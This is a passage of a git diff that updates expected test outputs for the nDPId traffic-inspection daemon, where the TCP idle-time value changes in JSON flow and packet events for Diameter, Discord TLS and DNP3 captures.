-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7440000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00912{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1263278878271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":398,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":398,"pkt_l4_len":364,"thread_ts_msec":1263278878271,"pkt":"ABpk3ZWLACYYlIbACABFAAGABtlAAIAGAAAKyQn1CskJC8cNDxz34fq2+LwvkFAY+gQqBAAAAQABWIAAARAAAAAEAupJMCbwAAMAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAc1AAAAUQ29tdmVyc2UuRENJAAABAkAAAAwAAAAEAAABCEAAABlueGwxLm5ldHhjZWxsLmNvbQAAAAAAAShAAAAUbmV0eGNlbGwuY29tAAABn0AAAAwAAAAAAAABJUAAABlkZ3UyLmNvbXZlcnNlLmNvbQAAAAAAARtAAAAUY29tdmVyc2UuY29tAAAAN0AAAAzO9pmeAAABu0AAACgAAAG8QAAAFDkxOTA4MDAwMDAxNgAAAcJAAAAMAAAAAAAAAbhAAAAkAAABuUAAAAwAAAACAAABukAAAA1kYmlsbAAAAAAAAaBAAAAMAAAAAQAAAbVAAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQ="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7440000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}} -00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1263278878292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":290,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":290,"pkt_l4_len":256,"thread_ts_msec":1263278878292,"pkt":"ACYYlIbAABpk3ZWLCABFAAEUlYlAAEAGe8kKyQkLCskJ9Q8cxw34vC+Q9+H8DlAYGSCUIQAAAQAA7EAAARAAAAAEAupJMCbwAAMAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAQxAAAAMAAAH0QAAAQhAAAAaZHNsdTEuY29tdmVyc2UuY29tAAAAAAEoQAAAFGNvbXZlcnNlLmNvbQAAAQJAAAAMAAAABAAAAaBAAAAMAAAAAQAAAZ9AAAAMAAAAAAAAARZAAAAMAABBbQAAADdAAAAMzvaZ5QAAAcBAAAAMAAAABQAAAa9AAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQ="} -00933{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1263278878336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":414,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":414,"pkt_l4_len":380,"thread_ts_msec":1263278878336,"pkt":"ABpk3ZWLACYYlIbACABFAAGQBtpAAIAGAAAKyQn1CskJC8cNDxz34fwO+LwwfFAY+RgqFAAAAQABaIAAARAAAAAEAupJMSbwAAUAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAc1AAAAUQ29tdmVyc2UuRENJAAABAkAAAAwAAAAEAAABCEAAABlueGwxLm5ldHhjZWxsLmNvbQAAAAAAAShAAAAUbmV0eGNlbGwuY29tAAABn0AAAAwAAAABAAABJUAAABlkZ3UyLmNvbXZlcnNlLmNvbQAAAAAAARtAAAAUY29tdmVyc2UuY29tAAAAN0AAAAzO9pmeAAABu0AAACgAAAG8QAAAFDkxOTA4MDAwMDAxNgAAAcJAAAAMAAAAAAAAAaBAAAAMAAAAAgAAAbVAAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQAAAG+QAAANAAAAZ1AAAAsAAABvUAAABgAAAG\/QAAAEAAAAAAAAAABAAABqUAAAAwAAAFk"} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1263278878271,"flow_last_seen":1263278878357,"flow_idle_time":7440000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":1,"thread_ts_msec":1263278878357,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7560000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00912{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1263278878271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":398,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":398,"pkt_l4_len":364,"thread_ts_msec":1263278878271,"pkt":"ABpk3ZWLACYYlIbACABFAAGABtlAAIAGAAAKyQn1CskJC8cNDxz34fq2+LwvkFAY+gQqBAAAAQABWIAAARAAAAAEAupJMCbwAAMAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAc1AAAAUQ29tdmVyc2UuRENJAAABAkAAAAwAAAAEAAABCEAAABlueGwxLm5ldHhjZWxsLmNvbQAAAAAAAShAAAAUbmV0eGNlbGwuY29tAAABn0AAAAwAAAAAAAABJUAAABlkZ3UyLmNvbXZlcnNlLmNvbQAAAAAAARtAAAAUY29tdmVyc2UuY29tAAAAN0AAAAzO9pmeAAABu0AAACgAAAG8QAAAFDkxOTA4MDAwMDAxNgAAAcJAAAAMAAAAAAAAAbhAAAAkAAABuUAAAAwAAAACAAABukAAAA1kYmlsbAAAAAAAAaBAAAAMAAAAAQAAAbVAAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQ="} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7560000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}} +00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1263278878292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":290,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":290,"pkt_l4_len":256,"thread_ts_msec":1263278878292,"pkt":"ACYYlIbAABpk3ZWLCABFAAEUlYlAAEAGe8kKyQkLCskJ9Q8cxw34vC+Q9+H8DlAYGSCUIQAAAQAA7EAAARAAAAAEAupJMCbwAAMAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAQxAAAAMAAAH0QAAAQhAAAAaZHNsdTEuY29tdmVyc2UuY29tAAAAAAEoQAAAFGNvbXZlcnNlLmNvbQAAAQJAAAAMAAAABAAAAaBAAAAMAAAAAQAAAZ9AAAAMAAAAAAAAARZAAAAMAABBbQAAADdAAAAMzvaZ5QAAAcBAAAAMAAAABQAAAa9AAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQ="} +00933{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1263278878336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":414,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":414,"pkt_l4_len":380,"thread_ts_msec":1263278878336,"pkt":"ABpk3ZWLACYYlIbACABFAAGQBtpAAIAGAAAKyQn1CskJC8cNDxz34fwO+LwwfFAY+RgqFAAAAQABaIAAARAAAAAEAupJMSbwAAUAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAc1AAAAUQ29tdmVyc2UuRENJAAABAkAAAAwAAAAEAAABCEAAABlueGwxLm5ldHhjZWxsLmNvbQAAAAAAAShAAAAUbmV0eGNlbGwuY29tAAABn0AAAAwAAAABAAABJUAAABlkZ3UyLmNvbXZlcnNlLmNvbQAAAAAAARtAAAAUY29tdmVyc2UuY29tAAAAN0AAAAzO9pmeAAABu0AAACgAAAG8QAAAFDkxOTA4MDAwMDAxNgAAAcJAAAAMAAAAAAAAAaBAAAAMAAAAAgAAAbVAAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQAAAG+QAAANAAAAZ1AAAAsAAABvUAAABgAAAG\/QAAAEAAAAAAAAAABAAABqUAAAAwAAAFk"} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1263278878271,"flow_last_seen":1263278878357,"flow_idle_time":7560000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":1,"thread_ts_msec":1263278878357,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-data-len":1656,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1263278878357} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 diff --git a/test/results/discord.pcap.out b/test/results/discord.pcap.out index 0e424955e..44b894cff 100644 --- a/test/results/discord.pcap.out +++ b/test/results/discord.pcap.out @@ -1,12 +1,12 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"discord.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} -00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":42193,"flow_last_seen":42193,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":42193,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":42193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":42193,"pkt":"UlQAEjUCCAAnW\/mGCABFAAA8+ptAAEAGEIkKAAIPop+A6adSAbuGXfMIAAAAAKAC+vDjjQAAAgQFtAQCCAqmenD7AAAAAAEDAwc="} -00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":42208,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":42208,"pkt":"CAAnW\/mGUlQAEjUCCABFAAAsAYYAAEAGSa+in4DpCgACDwG7p1IAKQQBhl3zCWAS\/\/9B4AAAAgQFtA=="} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":42209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":42209,"pkt":"UlQAEjUCCAAnW\/mGCABFAADY+p1AAEAGD+sKAAIPop+A6adSAbuGXfMJACkEAlAY+vBAZwAAFgMBAKsBAACnAwPx8xjD5ySSyjBvN4nq\/yhxDwDcyJh8lqatQ2ebeRUbCgAAGMArwCzMqcAvwDDMqMATwBQAnACdAC8ANQEAAGb\/AQABAAAAABAADgAAC2Rpc2NvcmQuY29tABcAAAAjAAAADQAUABIEAwgEBAEFAwgFBQEIBgYBAgEABQAFAQAAAAAAEAAOAAwCaDIIaHR0cC8xLjEACwACAQAACgAIAAYAHQAXABg="} -00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":42193,"flow_last_seen":42209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":42209,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00879{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2886,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","server_names":"discord.com,sni.cloudflaressl.com,*.discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3","subjectDN":"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com","alpn":"h2,http\/1.1","fingerprint":"31:3B:70:94:D5:DF:90:78:9C:A0:74:26:20:24:E4:3D:92:A7:57:9D"}} -00788{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":42193,"flow_last_seen":42247,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":42247,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"}} +00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":42193,"flow_last_seen":42193,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":42193,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":42193,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":42193,"pkt":"UlQAEjUCCAAnW\/mGCABFAAA8+ptAAEAGEIkKAAIPop+A6adSAbuGXfMIAAAAAKAC+vDjjQAAAgQFtAQCCAqmenD7AAAAAAEDAwc="} +00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":42208,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":42208,"pkt":"CAAnW\/mGUlQAEjUCCABFAAAsAYYAAEAGSa+in4DpCgACDwG7p1IAKQQBhl3zCWAS\/\/9B4AAAAgQFtA=="} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":42209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":42209,"pkt":"UlQAEjUCCAAnW\/mGCABFAADY+p1AAEAGD+sKAAIPop+A6adSAbuGXfMJACkEAlAY+vBAZwAAFgMBAKsBAACnAwPx8xjD5ySSyjBvN4nq\/yhxDwDcyJh8lqatQ2ebeRUbCgAAGMArwCzMqcAvwDDMqMATwBQAnACdAC8ANQEAAGb\/AQABAAAAABAADgAAC2Rpc2NvcmQuY29tABcAAAAjAAAADQAUABIEAwgEBAEFAwgFBQEIBgYBAgEABQAFAQAAAAAAEAAOAAwCaDIIaHR0cC8xLjEACwACAQAACgAIAAYAHQAXABg="} +00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":42193,"flow_last_seen":42209,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":42209,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00879{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2886,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","server_names":"discord.com,sni.cloudflaressl.com,*.discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3","subjectDN":"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com","alpn":"h2,http\/1.1","fingerprint":"31:3B:70:94:D5:DF:90:78:9C:A0:74:26:20:24:E4:3D:92:A7:57:9D"}} +00788{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":42193,"flow_last_seen":42247,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":42247,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"}} 00542{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"discord.pcap","alias":"nDPId-test","packets-captured":7,"packets-processed":7,"total-skipped-flows":0,"total-l4-data-len":3306,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":42247} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 7/7 diff --git a/test/results/dnp3.pcap.out b/test/results/dnp3.pcap.out index e56ae66e7..33a43687a 100644 --- a/test/results/dnp3.pcap.out +++ b/test/results/dnp3.pcap.out @@ -1,60 +1,60 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dnp3.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1097501938503} -00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097501938503,"flow_last_seen":1097501938503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097501938503,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 